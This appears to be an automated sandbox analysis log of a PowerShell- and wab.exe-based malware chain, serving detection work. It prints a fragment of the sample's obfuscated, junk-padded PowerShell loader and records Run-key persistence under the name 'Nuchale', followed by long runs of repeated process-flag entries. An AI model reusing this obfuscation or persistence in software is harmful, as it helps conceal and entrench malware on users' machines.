Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 13_2_004044A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAA6F87 push esp; retf 1_2_00007FFD9BAA6F88
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAA4FAC pushfd ; retf 1_2_00007FFD9BAA4FCA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAA3EAF push ds; retf 1_2_00007FFD9BAA3EB2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAA65F3 push eax; iretd 1_2_00007FFD9BAA65F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAA457C push eax; retf 1_2_00007FFD9BAA45A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAA3DA4 push cs; retf 1_2_00007FFD9BAA3DB2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAA45A4 push eax; retf 1_2_00007FFD9BAA45A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAA45A4 push ecx; retf 1_2_00007FFD9BAA45C2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAA78FB push ebx; retf 1_2_00007FFD9BAA796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAA7958 push ebx; retf 1_2_00007FFD9BAA796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAA813C push ebx; ret 1_2_00007FFD9BAA816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAA54AD push es; iretd 1_2_00007FFD9BAA54B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BB717EB push ebp; retf 1_2_00007FFD9BB717EC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BB71800 push ebp; retf 1_2_00007FFD9BB71801
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BB75588 push eax; ret 1_2_00007FFD9BB75589
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07360AB8 push eax; mov dword ptr [esp], ecx 5_2_07360AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_073608D8 push eax; mov dword ptr [esp], ecx 5_2_07360AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044693D push ecx; ret 13_2_0044694D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00451D54 push eax; ret 13_2_00451D61
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00444E71 push ecx; ret 14_2_00444E81
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00414060 push eax; ret 15_2_00414074
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00414060 push eax; ret 15_2_0041409C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00414039 push ecx; ret 15_2_00414049
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Nuchale Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Nuchale Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_004047CB
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
